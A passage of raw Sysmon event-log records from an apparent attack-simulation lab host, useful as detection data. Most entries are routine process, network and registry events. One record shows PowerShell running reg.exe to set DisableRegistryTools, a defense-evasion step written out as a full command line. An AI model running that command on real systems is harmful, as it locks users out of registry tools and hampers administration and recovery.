Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:25.019{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 354300x800000000000000010886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:25.491{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53711-false10.0.1.12-8000- 23542300x800000000000000010885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:26.488{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B0AA599E42E2FA5EEDA290FF48B262F,SHA256=04AD42ACDE96B32B2E60AABF9E087B1A75BDCEB5264C0CD736025219CCF89E27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:27.519{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EB862D2A8C93E46B7A35E3ED821ABB0,SHA256=B41D33706EA137AA5A7D0EE39D82396B152A75DB999996335092B12B9CBA2883,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:28.550{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E2CBA11F636BCB81A965F28B1BE5217,SHA256=4B0828FCE06649B082D7DF596EE79CEA63049181BE91ADEB8BD796FA957CB04C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:29.613{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57947BBCF9E4170A00FEA8B73B884922,SHA256=6CBED16BBACEAC58ACA94B33F7EC88DFABC8B292E5F63CC69FA20C105FCF9CDB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:29.597{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:29.597{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:29.581{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:29.581{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:29.581{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:29.581{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:30.628{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB1BE1A933FFD554A7A2B7C06F04A750,SHA256=F57B85680693BFA45C72CD181DCFE6D11E19A80E689AE553C45595010A67922E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:31.644{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC3A328B338C42313E76739CE8EEA9D0,SHA256=70124F85AD1755BCFBBDDAF08C6BE6E9B317A9AE094FBF6A44FF792C1BB9B481,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:32.659{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3090A02854A10B346ADA5F13028DC50,SHA256=FC5689477942692E31CFEA31323D4B3D9D052EC5DB6A6BDA1837739C1DA0EA18,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:30.632{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53712-false10.0.1.12-8000- 13241300x800000000000000010906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:32.128{266CAFBE-667C-6064-7301-00000000AE01}2852C:\Windows\SysWOW64\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryToolsDWORD (0x00000001) 10341000x800000000000000010905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:32.128{266CAFBE-65AC-6064-5101-00000000AE01}55606832C:\Windows\system32\conhost.exe{266CAFBE-667C-6064-7301-00000000AE01}2852C:\Windows\SysWOW64\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:32.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:32.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:32.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:32.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:32.112{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-667C-6064-7301-00000000AE01}2852C:\Windows\SysWOW64\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:32.112{266CAFBE-65AB-6064-5001-00000000AE01}24562612C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-667C-6064-7301-00000000AE01}2852C:\Windows\SysWOW64\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+781c0|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+23cc02(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+1aaaa4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+1aa39c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5d4219a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537afa3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537aca0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5cb9293(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5344c0d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5394e98(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537ce58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537ce58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537cd75(wow64) 154100x800000000000000010898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:32.124{266CAFBE-667C-6064-7301-00000000AE01}2852C:\Windows\SysWOW64\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=ECB768001DC8424E9B1FF3AC1E89C937,SHA256=CBB9F8D012CB0AF2CA87AC74ABB5C77A7743C64697C8D92104D3EBA27A699AB0,IMPHASH=7EF58A970E6E6D04FE3D5D7732CF5BAA{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000010911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:33.659{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD81E57059A23A0A148C111C6EC7C6E6,SHA256=A65A5FAD3CDCAD56C437059F89DA5DF39AE6AC4C4AF120312AF7D856F75D9BA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:33.128{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C02E7FB33577F719410400EED48FE052,SHA256=C9B80B132CEFF062C57209ECCF67F242DA40CF972EFC16E8B241D6A7923E818F,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000010909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:33.018{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0xb5b9e68d) 23542300x800000000000000010913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:34.675{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=539AA435D0148B46CF1E7D20E820F2D3,SHA256=E68BA4836EF01694DD5E2B82C34711BC098FE973936D06B65B4DDD06DBD3EC5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:34.159{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x800000000000000010920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:35.893{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueBinary Data 13241300x800000000000000010919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:35.893{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueSizeDWORD (0x00000008) 13241300x800000000000000010918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:35.893{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\KeySizeDWORD (0x00000000) 13241300x800000000000000010917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:35.893{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\TimestampQWORD (0x01d72626-0xb77087cc) 13241300x800000000000000010916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:35.893{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NetworksBinary Data 13241300x800000000000000010915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:35.893{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NumNetworksDWORD (0x00000001) 23542300x800000000000000010914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:35.690{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D719F9BCCF55CECFCF0710BA43358CA8,SHA256=6CAF31334738A8D3DFA2B03AF0E2125F00F587C7CED45E28FD3402BDB0409E09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:36.690{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB3784A975C2A77CA73E2C451AD99E22,SHA256=887A15F48D5DDC724B242894F3ADB450C58BA92E8C1DC60AB9C0B819DFF623DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:37.706{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97A51353FC99F36613E83FD7338E95F6,SHA256=5CFCFBA2A7A604BD09C894B7494D546CB37E589969CC4B32B42B1BE6CED66DC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:38.705{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAD02C85522615E5BD66636E7C048623,SHA256=8D992925C31FB1FD61D00A8290A3C986898D85796C5079ABB79EA49C4B15F232,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:36.569{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program 